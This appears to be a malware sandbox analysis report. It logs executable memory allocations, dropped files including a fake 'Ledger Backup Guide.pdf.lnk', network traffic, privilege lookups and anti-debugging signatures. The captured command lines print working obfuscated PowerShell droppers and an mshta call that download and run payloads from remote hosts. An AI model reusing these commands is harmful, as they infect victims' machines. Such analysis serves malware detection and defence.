protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02857000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02802000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02855000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0280c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0285c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02803000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02804000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02805000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02806000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02807000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02808000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02809000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\23.exe
file C:\Users\test22\AppData\Local\Temp\Ledger Backup Guide.pdf.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
cmdline "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $g='s:aLh43vArH20fMw6p917T/5.t'; &(-join($g[(996-996),(689-687),(-418+421)])) ~= (-join($g[(996-996),(689-687),(-418+421)])); ~= ^[ (-join($g[(294-280),(996-996),(725-721),(507-486),(689-687)])); foreach($n in @((386-382),(-941+966),(-367+392),(-106+123),(182-181),(979-957),(-369+391),(219-201),(-305+310),(-665+689),(-104+123),(-842+865),(-848+853),(792-768),(-440+459),(894-874),(407-396),(223-199),(-875+894),(575-559),(999-983),(217-195),(889-880),(-550+565),(220-211),(363-356),(716-694),(975-969),(-94+106),(-924+936),(699-679),(-806+819),(785-761),(-599+603),(1005-980),(-774+776))){$O+=$g[$n]}; ^[ $O;
file C:\Users\test22\AppData\Roaming\23.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x003f0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received Wf©Î·uZZEÏi:å(—šA74š·#Vi“¬ ʎ ÿMŒæßîÅAÆa]¤ìÛÑLÎjà]=QÝâ%篑ÆAÀÿ 
Data received 
Data received K
Data received GANvÞØï5-bÄP:¢R%ÿY$Øqb‰÷F‹8rUS’¶ÛÏj¬„Ñü™àR›Niá¯Ï¬äiVàÞ_1Í  ϐ’ªZŠ5V²¿RÐ>ä'yʼ²LꔵÄóóع%µð‚Ùò*¥òØVáÌ:foê'Ò1¤ƒN9¤RæÎYÇ-"™äé` òÏÁéLìÕä'³îùãs÷$ïl%yœUso»l'`Ë÷tȶž En?Ždd7=âš@¤˜·L 38 ¡ê-©×ɗä`…ÿ”£º?2À!0Ĥ;]K[ß ì¬"¢5b.y‹•{*,{¯aAºô~ À«GËÿ˜ù²UÂ×+S<_ß÷J¨Y+x.éé6i‘=JX8¤þóºP|iâý¿ò¢ T寭Œ ÞÆ
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received xƒ\J«È8±cÎ$âaÁ°uìþF,j; þæÅ%·À ßò£I A¥Ñü Ò
Data received p
Data received ļ\P˅Ô/±ñmŸk߆f/Sñ?å ƒÂlú¯¨œsþí¡”˜ß/ß°Pvÿ*Ä£é@ “¯üÌ? eM-ÿxÑç6ÆPyÁkǘIá›éK íü¬À™iBZ(KfdÃVœÆyjXŒM+s¸¼ÅÅx¦Ë=JޘȲíM"I¡]‡išÿHœ5³† \e±l «¦1¾ÛŒR•ê2Éî”z—aø=°í(çœAâºraQp_ÿï¶-º²Tÿ›NH"4™¶Iö:Ä⭎ú8î()ªµ2®Å±8W®ÝöþS)A>yš–r©lnêNpëÙÿGªÇܵ<b±êM¹Jt££ÃdVMÅ\÷8µ^•›#'5˜ùêsl›6΄<ÉÑ:½ÃIvqRÕy(©. ´œÖFu2#ÇAZâ’6>i˜µ2šû©ñ\k‘G—M—ÒÓ»/ö.2-Ž¦‰ç ²4bYXYM‘kôÏ، ÃV~BŽ6¨hò²S$>sˆ¼1 ôBÚK]æ1‹Ö€¤a‘.6æ¤×/6µÍD¨qÁ²ÔFü‡dp¢Z…ñêWKì Ëĸ.YZåù­ÞPQQôcek|ôcÑ~~Mã‘ZæÝ̸U¶ -oìv»­\†=·]QcexãßÿYLr¡¢k"#ž ðÄEIå5,ñ¤:ŒúÞËiن’ƒ²)§=`Gl¡ý€´HìÿX·t-«ôõRÈΨ'Ö¯7W}F³g¨dŽh~~íÑ«ÔyfÔ$ø\.’)H7ãoRw±‹uS¯9åbñÁ硙õü”PHíJ‰çß´Ø(2¸¸åi);$#–—}ps²9ZàÚ$syNÍYµÎo0KbBáx%*Ôõž»qÍ]›Æªk² €ÚvƚPë é¼îÈ«´©þê7ü¬ÎS¤»ii¢ùqJܸ ‚jí%“~$ᤠC6£D•ÑžÖYxn9r™…¡-žÝ·_¦ñ,^IË$'øw›ìÞÖ{` \ŒµôpSæz2þ¨©Gñ^ž1éi£ Å-LJÏåЎ~1‘/"W~ȏò J›Ñøc$E[€+¸#ͅíg\èEý3±Osgý”ñ„ðþDIÓ¦bȬ=kŒ&UZµO§Xáwu  1ÊØokøKž’!)—w–ßü½é¦çh‹˜_éör7hsµaWK¶JñF›„åGàÑóâ¯):Kk…”46nMö;}¡í[p¢ìuB©x™®Ñ!wWì<÷ÝEՑZ9Œ u‡+kÈÿ‘¶Ïž3K™Þö<ggÂ8 3ßXp)t<Âfµâ¦èS2@ýŸ”M›†r{®uMbPwšª \Ð ý#ìRg•"™mâùûªÅø¬œ—yG(ƒ£`‰ÞÍÑn¤™ÝÍôƟJ7TÚfw3S¾O<ñ—æ­@Iꦃn±YYôÉ*Ò¥e4 èŒ?
Data received 
Data received F
Data received 6SORRURRRRRRRRRRRRRRRRRRRRRR__vbaVar2Vec†http://poslisoubor.cz/gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txtpC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe4WinHttp.WinHttpRequest.5.1GETOpenSendStatusResponseBody__vbaFreeObj__vbaLateMemCallLd__vbaVarTstEq__vbaLateMemCall__vbaObjVar__vbaObjSetAddref__vbaVarCat__vbaStrVarMove__vbaI2I4__vbaAryMove__vbaFreeVarList__vbaStrVarVal__vbaLbound__vbaUboundÿÌ1Ž1@TíOÜÞíL̪§7_çyœL|K¾É_qm©¦g:O­3™fÏ· ª`ӓC>Form1 Form1B#ÿÿÿÿ$Form15xÑÐÇ FÿÿÌ1ݤF©äŸ¤N£è2mJ@MèoÃ1[’ìG“ ¸IU3rO­3™fÏ· ª`ӓLGMDIForm1MDIForm1 €#ÿÿÿÿ$MDIForm15xÑÐÇ FÿP6@Ð6@l§{ÿÿÿÿP@ÿÿÿÿ@6@@6@@6@@6@@È@ÿÿÿÿ@6@ÿÿÿÿ´@L@T@´@(@T@@ÿÿÿÿ@6@@6@@6@@6@@ééééÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒìh†@d¡Pd‰%ƒìhSVW‰eøÇEü@‹U3ÀMà‰Eè‰Eä‰Eà‰E܉E؉EԉEЉẺE¼ÿÌ@hŒ@è‹5ð@‹ÐMÜÿ֋EÜPh|!@èù‹ÐMÐÿ֋(@PÿӋЍMÜÿ֋= @MÐÿ׋MÜQhl%@èɋЍMÐÿÖPÿӋЍMÜÿ֍MÐÿ׋UÜRh\)@襋ЍMÐÿÖPÿӋЍMÜÿ֍MÐÿ׋EÜPhL-@聋ЍMÐÿÖPÿӋЍMÜÿ֍MÐÿ׋MÜQh¤@è]‹ÐMÐÿÖPÿӋЍMÜÿ֍MÐÿ׋U܋=@jRÿי+ÂÑøƒè€!PjEäjPjh€ÿx@‹M܃ÄQÿ׉E¸¿;}¸‰EĉE¼‹Eä…Àt&fƒ8u ‹Mè‹P+ʋP;ʉMœr ÿ\@‹Mœ‰Mˆë ÿ\@‰Eˆ‹E܍U¼hD@RWPÿL@‹ÐMÐÿÖPÿӋЍMÌÿÖPÿô@‹Mä‹Q ‹Mˆˆ U̍EÐRPjÿÐ@ƒÄ M¼ÿ @‹M踃Á€KljMè€@‹ø¸é?ÿÿÿ‹UäEØRPÿä@‹M؅Étfƒ9u‹q‹A÷Þ;ðr ÿ\@‹M؋Æë ÿ\@‹M؋I ‹5°@ÈQÿ֋@UØR‹øÿӋEàPÿ°@‹M ‰E EԋRPÿä@‹MԅÉt#fƒ9u‹A‹Q÷Ø;‰E˜rÿ\@‹MԋE˜ë ÿ\@‹MԋI ÈQÿ֍UԋðRÿӋE jjVPWè^âÿÿÿ,@hs:@ë/‹5@MØQÿ֍UÔRÿ֍E̍MÐPQjÿÐ@ƒÄ M¼ÿ @ÍUäRjÿ8@‹5 @Màÿ֍MÜÿÖËMð_^d‰ [‹å]Âÿ¼@U‹ìƒì h†@d¡Pd‰%ƒìLSVW‰eôÇEø(@‹U3ÀM؉Eä‰Eà‰E؉EԉEЉEÀÿÌ@¹Þÿ€@ˆE܋EØPÿ@‹=ð@»‰E¨‹ó;u¨‹M不UÀ‰EȉEÀ‹EØQRVPÿL@‹ÐMÔÿ×Pÿ @‹Uܿȁâÿ3ÊQÿ´@‹ÐMÐÿ×Pÿ(@‹ÐMäÿ׍EЍMÔPQjÿÐ@ƒÄ MÀÿ @‹ÓÖpm‹òé|ÿÿÿ‹UäMàÿÌ@hÕ;@ë,öEüt Màÿ @EЍMÔPQjÿÐ@ƒÄ MÀÿ @Ë5 @Mäÿ֍MØÿÖËMì‹Eà_^d‰ [‹å]Âÿ¼@U‹ìƒì h†@d¡Pd‰%ƒìlSVW‰eôÇEø8@‹u3ۉ]à‰]܋‰]ØPj‰]ȉ]¸‰]¨ÿp@‹‹øQjÿ¤@‹ðS+÷Eà€­ƒÆ€¤‹Öƒê€™RjjPjh€ÿx@ƒÄƒî€z‰uˆ3ÿ;}ˆ‹M‹;Ãtfƒ8u‹P‹H‹÷+ò;ñrÿ\@‹Þëÿ\@‹Ø‹E UȉE°R‹ÇEÐPÇEÈÇE¨@ÿ@‹È‹Ç™÷ùE¸ƒÂ€RU¨RPÿP@‹Eà…Àtfƒ8u‹P‹H‹÷+ò;ñrÿ\@ëÿ\@‹ðM¸UØQRÿ¨@Pÿ @f‹È‹E‹‹B f¶3Êÿ€@‹Mà‹Q M؈2ÿ @E¸MÈPQjÿ@¸ƒÄ Çpp‹ø3ÛéòþÿÿUàEÜRPÿ@hý=@ë/öEüt MÜQjÿ8@MØÿ @U¸EÈRPjÿ@ƒÄ ÍMàQjÿ8@ËMì‹EÜ_^d‰ [‹å]Âÿ¼@U‹ìƒìh†@d¡Pd‰%ƒì(SVW‰eøÇEüH@3öº@2@‰uì‰uè‰u؉uԉuЉű5Ì@MìÿÖºŒ2@Mèÿ֍EèPè‹5@MÔQhHP@‰EÔÿ֍Mèÿ @UØÇEàHP@RÇEØ`ÿ0@f…Àu!EìPhHP@è8ýÿÿMԉEÔQhLP@ÿÖèEh ?@ë Mèÿ @Ë=8@UÐ3öRVÿ׍EÌPVÿ׍Mìÿ @ËMð_^d‰ [‹å]АU‹ìƒìh†@d¡Pd‰%ƒìSVW‰eøÇEüX@º3@MìÇEìÿÌ@‹EìhLP@Pè´÷ÿÿh{?@Mìÿ @ËMð_^d‰ [‹å]АU‹ìƒì h†@d¡Pd‰%ìˆSVW
Data sent tpf©Î®sY Ñ7ä\¤âè «ÐêÔR[ÖJ'êk£8/5 ÀÀÀ À 28/ÿwww.mediafire.com  
Data sent FBAsªö†°ýƃ55— fÌhö2:æ¦#?’¾æÃ|òÃu² o’³ ½§<ØÄiWí3؛Lví×æ>C]¨x0‡vŽ: ¤WÛk[f…uF9q<×>ië‘Í/çúŠVñ—\¯¬+8¬¥’ý°“a\´
Data sent l‚kuSìöâ±2ðˆ~á˜N…6.*ÀP)jß·ìa¾¸NDÿÔ R2‚"U;†ù7\¸„yƁAlH;@r¨bŒ6B”’¦ÖÝM åd”#²´è@‘Lõaü:…½…F÷ ¦2ý³Ï>©(™æ<È lîeÑâŸN Ó’± 8æ ÅÖv*ºÊΧ
Data sent }yf©Î®^h15Pœbȕïd 'lR²ð÷žÈžjÞߛ ˜ô/5 ÀÀÀ À 288ÿdownload2268.mediafire.com  
Data sent }yf©Î¯’$².ÚÜøáBYíütÁ2*ծݎ1N"³ˆ¹ /5 ÀÀÀ À 288ÿdownload2268.mediafire.com  
Data sent GET /rwrv/23.exe HTTP/1.1 Host: 94.154.172.166 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
